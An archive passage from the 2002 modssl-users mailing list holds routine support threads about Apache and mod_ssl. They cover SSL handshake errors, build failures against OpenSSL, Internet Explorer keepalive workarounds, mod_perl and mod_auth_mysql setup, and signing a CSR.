"show friendly HTTP error messages" (Tools | Internet Options | Browsing
section)
or by unchecking the "Use SSL 3.0" (Tools | Internet Options | Security
section)

...but this is an unacceptable solution for my boss =(.


To cure this problem we have tried several things already on the server side
including adding these lines to our HTTPD.conf file for Apache
(using ModSSL with Enhydra \ apache)...

- Setting the SSL Cache variable higher

SSLSessionCache(512000)

- switching off SSLv3 in the server config

SSLProtocol all -SSLv3

- Detecting when a MSIE connects to the server and removing the "keep alive"
command for this instance

SetEnvIf User-Agent ".*MSIE.*" \
             nokeepalive ssl-unclean-shutdown \
             downgrade-1.0 force-response-1.0


- Tried specifiying which cipher encryption to use to work around the known
export 56k IE bug

SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP


Below is a list of packages that are relevant to our system and version
numbers for our live server.

REDHAT 6.2.1
KERNEL 2.2.19-6.2.12
APACHE 1.3.9
MOD_SSL 2.4.5
POSTGRES 6.5-3.6
LDAP 1.2.12
OPENSSL 0.9.4
IMAP 2000c-1.6.1
ENHYDRA 3.1
JAVA 1.3

Also below is a list of the same packages and version numbers from our local
development server.

REDHAT 7.0
KERNEL 2.2.17-14smp
APACHE 1.3.14-3
MOD_SSL 2.7.1
POSTGRES 7.0.2-17
LDAP 1.2.11
OPENSSL 0.9.5a
IMAP 4.5-4
ENHYDRA 3.1
JAVA 1.3

I am very quickly running out of solutions to try to cure this problem so
any new ideas \ solutions would be very greatly appreciatted =)

Cheers

Nigel Croston


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 18:10:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26089; Tue, 6 Aug 2002 18:09:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id SAA26080; Tue, 6 Aug 2002 18:08:36 +0200 (MET DST)
Received: by irvexch1.rainbow.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 6 Aug 2002 09:14:10 -0700
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C0472B@irvexch1.rainbow.com>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: RE: Apache_1.3.26 with mod_ssl: build failed
Date: Tue, 6 Aug 2002 09:14:09 -0700 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In general, the mod_ssl configuration script doesn't seem to deal with this;
my experience using CryptoSwift with Apache is that on most platforms you
have to edit src/Makefile for Apache after doing the mod_ssl configure, to
add -ldl.  Everything else, mod_ssl configures properly.

Lynn Gazis

-----Original Message-----
From: Geoff Thorpe [mailto:geoff@geoffthorpe.net]
Sent: Monday, August 05, 2002 8:47 PM
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26 with mod_ssl: build failed


On Mon, 5 Aug 2002, Cliff Woolley wrote:

> On Mon, 5 Aug 2002, Adrian Hardt wrote:
>
> > /home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In
function `dlfcn_unload':
> > dso_dlfcn.o(.text+0x3a7): undefined reference to `dlclose'
> > collect2: ld returned 1 exit status
> > make[2]: *** [target_static] Error 1
> > make[2]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26/src'
> > make[1]: *** [build-std] Error 2
> > make[1]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26'
> > make: *** [build] Error 2
>
> Hmm... that's interesting.  Try building in mod_so so that libdl will be
> linked in.  Odd that your statically linked openssl library would want
> libdl though... hmph.

Nope, the DSO mechanism in openssl (for loading external engines or
whatever) requires it. If you call ENGINE_load_builtin_engines(), you'll
get a dependancy on DSO code whether it'll be used or not. It normally
doesn't show up because some systems don't need it (BSDs IIRC) and Apache
is usually built with a requirement on SO loading anyway so the linker
extras are already there.

I would have thought the mod_ssl configuration script would deal with this
though - either by grilling the openssl installation in some way, or by
doing its own autoconf-ish test, or at least by forcing the Apache
configuration to do it even if it doesn't want mod_so.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 21:13:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA00432; Tue, 6 Aug 2002 21:12:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id VAA00426; Tue, 6 Aug 2002 21:12:04 +0200 (MET DST)
Received: from GWIA1-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Tue, 06 Aug 2002 14:11:57 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2 Beta
Date: Tue, 06 Aug 2002 14:11:40 -0500
From: "Mary Peterson" 
To: 
Subject: Issues with Client Authentication
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We are having issues with the SSLVerifyClient require option enabled. 
Users are sometimes (more frequently as user levels increase)  receiving
'page cannot be displayed' errors and the error log is showing:

[Fri Aug 02 11:56:48 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxxx.org:443, client xxx.xxx.xxx) (OpenSSL library error
follows)
[Fri Aug 02 11:56:48 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]

But other times their authentication works fine.  They also determined
that when the  SSLVerifyClient require option was disabled that
performance and response time improved dramatically.  Does this have
anything to do with the SSLSessionCacheTimeout  300 variable or the
SSLVerifyDepth  10.  I don't know why are depth is set to 10 when we
just have a root and subordinate ca cert in our chain.  Should this be
changed to 2 and would this have anything to do with the error and
performance mentioned above?

I would appreciate any suggestions to resolve this issue.  Thanks!
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 22:53:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA02669; Tue, 6 Aug 2002 22:52:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id WAA02659; Tue, 6 Aug 2002 22:52:05 +0200 (MET DST)
Received: from GWIA1-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Tue, 06 Aug 2002 15:51:59 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2 Beta
Date: Tue, 06 Aug 2002 15:51:53 -0500
From: "Mary Peterson" 
To: 
Subject: Troubleshooting another ssl handshake failed problem
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does anyone know what would cause the following error???

[Fri Aug 02 11:56:45 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:56:45 2002] [error] OpenSSL: error:2706820C::lib(39)
:func(104) :reason(524)
[Fri Aug 02 11:56:45 2002] [error] OpenSSL: error:1408807A:SSL
routines:SSL3_GET_CERT_VERIFY:bad rsa signature
[Fri Aug 02 11:56:48 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:56:48 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]
[Fri Aug 02 11:57:31 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:57:31 2002] [error] OpenSSL: error:0D0A2007:asn1
encoding routines:d2i_X509_CINF:expecting an asn1 sequence
[Fri Aug 02 11:57:31 2002] [error] OpenSSL: error:0D09F004:asn1
encoding routines:d2i_X509:nested asn1 error
[Fri Aug 02 11:57:31 2002] [error] OpenSSL: error:1408900D:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:ASN1 lib
[Fri Aug 02 11:57:32 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:57:32 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 23:05:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA02954; Tue, 6 Aug 2002 23:04:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange00.SC.ESILICON.COM id XAA02934; Tue, 6 Aug 2002 23:03:07 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Tue, 6 Aug 2002 14:02:58 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D215D@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: Troubleshooting another ssl handshake failed problem
Date: Tue, 6 Aug 2002 14:02:57 -0700 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It looks like you need to update the CA authority certificates. If your
certificate came from verisign, their website gives directions on how to do
this (www.verisign.com)

David Marshall

-----Original Message-----
From: Mary Peterson [mailto:MPeterso@ifmc.org]
Sent: Tuesday, August 06, 2002 1:52 PM
To: modssl-users@modssl.org
Subject: Troubleshooting another ssl handshake failed problem


Does anyone know what would cause the following error???

[Fri Aug 02 11:56:45 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:56:45 2002] [error] OpenSSL: error:2706820C::lib(39)
:func(104) :reason(524)
[Fri Aug 02 11:56:45 2002] [error] OpenSSL: error:1408807A:SSL
routines:SSL3_GET_CERT_VERIFY:bad rsa signature
[Fri Aug 02 11:56:48 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:56:48 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]
[Fri Aug 02 11:57:31 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:57:31 2002] [error] OpenSSL: error:0D0A2007:asn1
encoding routines:d2i_X509_CINF:expecting an asn1 sequence
[Fri Aug 02 11:57:31 2002] [error] OpenSSL: error:0D09F004:asn1
encoding routines:d2i_X509:nested asn1 error
[Fri Aug 02 11:57:31 2002] [error] OpenSSL: error:1408900D:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:ASN1 lib
[Fri Aug 02 11:57:32 2002] [error] mod_ssl: SSL handshake failed
(server www.xxxxxxx.org:443, client xxx.xxx.xxx.xxx) (OpenSSL library
error follows)
[Fri Aug 02 11:57:32 2002] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  7 11:31:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18650; Wed, 7 Aug 2002 11:30:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA18581; Wed, 7 Aug 2002 11:29:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D7D134CE6E2; Wed,  7 Aug 2002 11:29:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3F85C28693; Wed,  7 Aug 2002 11:07:33 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.tcrop.net id DAA08495; Wed, 7 Aug 2002 03:14:29 +0200 (MET DST)
Received: (qmail 21440 invoked by uid 0); 6 Aug 2002 20:14:27 -0500
Message-ID: <20020807011427.21439.qmail@mail.tcrop.net>
Content-Type: text/plain;
  charset="iso-8859-1"
From: Tim Cropper 
To: modssl-users@modssl.org
Subject: .htaccess & mod_auth_mysql
Date: Tue, 6 Aug 2002 20:14:27 -0500
X-Mailer: KMail [version 1.3.1]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Tim Cropper 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm having problems getting .htaccess to work with mod_auth_mysql under 
mod_ssl. 

It works fine when using a .htpasswd file with mod_ssl.

mod_auth_mysql/.htaccess also work when NOT running under mod_ssl module.

I'm getting errors that tend to indicate that mod_auth_mysql is not 
recognized when running under mod_ssl 

Error: /.htaccess: Invalid command 'Auth_MySQL_DB'
The above error changes if I reorder the Auth_MySQL_xxx  lines.

Has anyone else had this problem or offer a solution?

Thanks
-Tim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  7 11:31:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18653; Wed, 7 Aug 2002 11:30:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA18582; Wed, 7 Aug 2002 11:29:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 026AC4CE73A; Wed,  7 Aug 2002 11:29:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B411628828; Wed,  7 Aug 2002 11:07:12 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp2.Stanford.EDU id XAA04002; Tue, 6 Aug 2002 23:49:56 +0200 (MET DST)
Received: from smtp2.Stanford.EDU (localhost [127.0.0.1])
	by smtp2.Stanford.EDU (8.11.6/8.11.6) with ESMTP id g76Lnqd02088
	for ; Tue, 6 Aug 2002 14:49:52 -0700 (PDT)
Received: from cipher.Stanford.EDU (cipher.Stanford.EDU [171.64.78.146])
	by smtp2.Stanford.EDU (8.11.6/8.11.6) with ESMTP id g76Lnnq02067
	for ; Tue, 6 Aug 2002 14:49:50 -0700 (PDT)
Date: Tue, 6 Aug 2002 14:49:49 -0700 (PDT)
From: nagendra modadugu 
To: modssl-users@modssl.org
Subject: apache+mod-ssl build error
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: nagendra modadugu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


apache_1.3.26 + mod_ssl-2.8.10-1.3.26 fail to compile when using
openssl-0.9.7-beta3:

gcc -c  -I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208110
-DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I../../lib/expat-lite -DNO_DL_NEEDED
`../../apaci` -DSSL_COMPAT -DSSL_USE_SDBM -DSSL_ENGINE
-I/home/nagendra/work/wasp/src/openssl-0.9.7-beta3/include
-DMOD_SSL_VERSION=\"2.8.10\" mod_ssl.c
In file included from ../../include/ap_config.h:467,
                 from mod_ssl.h:130,
                 from mod_ssl.c:65:
/usr/include/crypt.h:33: parse error before `('
/usr/include/crypt.h:33: parse error before `__const'

The problem is that crypt() is defined as a macro in des_old.h.  This
conflicts with the definition in crypt.h.  One solution to the problem is
to include ap_* headers before openssl headers in mod_ssl.h.

Does this seem like a reasonable solution?  It doesn't seem that mod_ssl
uses crypt() in any case.

nagendra
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  7 18:13:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA28207; Wed, 7 Aug 2002 18:12:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from suave.cnpsa.embrapa.br id SAA28171; Wed, 7 Aug 2002 18:11:17 +0200 (MET DST)
Received: from cnpsa.embrapa.br (macuco.cnpsa.embrapa.br [200.202.164.123])
	by suave.cnpsa.embrapa.br (8.9.3/8.8.7) with ESMTP id NAA07558
	for ; Wed, 7 Aug 2002 13:11:56 -0300
Message-ID: <3D514619.6060007@cnpsa.embrapa.br>
Date: Wed, 07 Aug 2002 13:08:57 -0300
From: Luiz Agnaldo Bernardi 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Compile of Apache
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Luiz Agnaldo Bernardi 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Firstly, excuse my weak English.    
I am trying to compile the Apache-1.3.26, with SSL (openssl-0.9.6d or 
mod_ssl-2.8.10-1.3.26) and mod_perl (mod_perl-1.26). I tried to compile 
in several different ways, for the Apache, using the openssl and for the 
mod_perl (INSTALL.simple.mod_ssl).   
Both seem to compile well and to generate the binary ones. SSL works 
well. However, in any situation I am getting to execute scripts PERL.   
Could anybody send me a compilation and installation script of the 
Apache with SSL and MOD_PERL that it works appropriately?   
I am using RedHat 6.2 in a Sun UltraSparc 10 with perl 5.003.   
Thank you.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  7 19:56:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA29859; Wed, 7 Aug 2002 19:55:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from itahost1.ita.org.mo id TAA29851; Wed, 7 Aug 2002 19:54:51 +0200 (MET DST)
From: EdwardSPL@ita.org.mo
Received: from ita.org.mo (c57line146.dialup3.ctm.net [202.175.43.147])
	by itahost1.ita.org.mo (8.9.3/8.9.3) with ESMTP id BAA05014
	for ; Thu, 8 Aug 2002 01:37:50 +0800
Message-ID: <3D515ED8.A9574F95@ita.org.mo>
Date: Thu, 08 Aug 2002 01:54:32 +0800
X-Mailer: Mozilla 4.7 [en] (WinNT; I)
X-Accept-Language: en,zh-TW
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Compile of Apache
References: <3D514619.6060007@cnpsa.embrapa.br>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: EdwardSPL@ita.org.mo
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Luiz Agnaldo Bernardi wrote:

> Firstly, excuse my weak English.
> I am trying to compile the Apache-1.3.26, with SSL (openssl-0.9.6d or
> mod_ssl-2.8.10-1.3.26) and mod_perl (mod_perl-1.26). I tried to compile
> in several different ways, for the Apache, using the openssl and for the
> mod_perl (INSTALL.simple.mod_ssl).
> Both seem to compile well and to generate the binary ones. SSL works
> well. However, in any situation I am getting to execute scripts PERL.
> Could anybody send me a compilation and installation script of the
> Apache with SSL and MOD_PERL that it works appropriately?
> I am using RedHat 6.2 in a Sun UltraSparc 10 with perl 5.003.
> Thank you.

Would you mind to tell me your compile and installation steps about your
apache 1.3.26, mod_ssl 2.8.10-1.3.26 and openssl 0.9.6d ?
Because before the time, I was fail to compile and install with the
following packages :
Apache 1.3.26
php 4.2.2
mod_ssl 2.8.10-1.3.26
OpenSSL 0.9.6d

But now, the I'm success to compile and install with the following packages
:
Apache 1.3.26
php 4.2.2
mod_ssl 2.8.10-1.3.26
OpenSSL 0.9.6e

Thank for your help !


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 09:27:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18507; Thu, 8 Aug 2002 09:26:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id JAA18503; Thu, 8 Aug 2002 09:25:41 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id JAA00781
	for ; Thu, 8 Aug 2002 09:25:35 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.4617);
	 Thu, 8 Aug 2002 09:21:43 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Compile of Apache
Date: Thu, 8 Aug 2002 09:21:42 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB80120BEF1@qeo00200>
Thread-Topic: Compile of Apache
Thread-Index: AcI+LRwf3jXK8NSaTmm/J2V+m7M83gAf4Vpg
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 08 Aug 2002 07:21:43.0144 (UTC) FILETIME=[3EF69680:01C23EAC]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA18504
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

you should use openssl-0.9.6.e anyway, beause openssl < 0.9.6.e contains several security bugs!


Kind regards,
B. Courtin


-----Original Message-----
From: Luiz Agnaldo Bernardi [mailto:Luiz.Bernardi@cnpsa.embrapa.br]
Sent: Wednesday, August 07, 2002 6:09 PM
To: modssl-users@modssl.org
Subject: Compile of Apache


Firstly, excuse my weak English.    
I am trying to compile the Apache-1.3.26, with SSL (openssl-0.9.6d or 
mod_ssl-2.8.10-1.3.26) and mod_perl (mod_perl-1.26). I tried to compile 
in several different ways, for the Apache, using the openssl and for the 
mod_perl (INSTALL.simple.mod_ssl).   
Both seem to compile well and to generate the binary ones. SSL works 
well. However, in any situation I am getting to execute scripts PERL.   
Could anybody send me a compilation and installation script of the 
Apache with SSL and MOD_PERL that it works appropriately?   
I am using RedHat 6.2 in a Sun UltraSparc 10 with perl 5.003.   
Thank you.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 10:07:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA19881; Thu, 8 Aug 2002 10:06:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id KAA19866; Thu, 8 Aug 2002 10:06:03 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA13808
	for ; Thu, 8 Aug 2002 10:05:57 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA05606
	for ; Thu, 8 Aug 2002 10:05:57 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: Compile of Apache
Date: Thu, 8 Aug 2002 10:05:56 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA8C1D@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Compile of Apache
Thread-Index: AcI+LXZd/vBIxCyuQA2+7XsUBYS1KgAgYSyA
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA19867
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>From: Luiz Agnaldo Bernardi [mailto:Luiz.Bernardi@cnpsa.embrapa.br]

>I am trying to compile the Apache-1.3.26, with SSL (openssl-0.9.6d or 
>mod_ssl-2.8.10-1.3.26) and mod_perl (mod_perl-1.26). I tried 
>to compile 
>in several different ways, for the Apache, using the openssl 
>and for the 
>mod_perl (INSTALL.simple.mod_ssl).   
>Both seem to compile well and to generate the binary ones. SSL works 
>well. However, in any situation I am getting to execute 
>scripts PERL.   
>Could anybody send me a compilation and installation script of the 
>Apache with SSL and MOD_PERL that it works appropriately?   
>I am using RedHat 6.2 in a Sun UltraSparc 10 with perl 5.003.   

Why do you think the problem is with compilation? Do you have any error messages which appeared during compile/install?

If you do "./httpd -l" do you see mod_perl? If so, then mod_perl is compiled in and the problem is not with the installation.

I ask this because mod_perl is quite sophisticated and it is possible that you installed it correctly but that it is not working for configuration reasons.

Rgds,

Owen Boyle
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  8 15:48:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA27117; Thu, 8 Aug 2002 15:47:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from m7.limsi.fr id PAA27112; Thu, 8 Aug 2002 15:46:36 +0200 (MET DST)
Received: from free.fr (corot-1.limsi.fr [192.44.78.59])
          by m7.limsi.fr (8.9.3/jtpda-5.3.1) with ESMTP id PAA21235
          for ; Thu, 8 Aug 2002 15:47:44 +0200 (MET DST)
Message-ID: <3D52759F.9BD3BA5B@free.fr>
Date: Thu, 08 Aug 2002 15:43:59 +0200
From: Philippe Marsalle 
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.17 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Looking for sign.sh
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Philippe Marsalle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I want to sign my own CSR and I don't find sign.sh on my system (
potatoe 2.2.19)
Thanks.

--
Philippe,
      pmars@free.fr



______________________________________________________________________
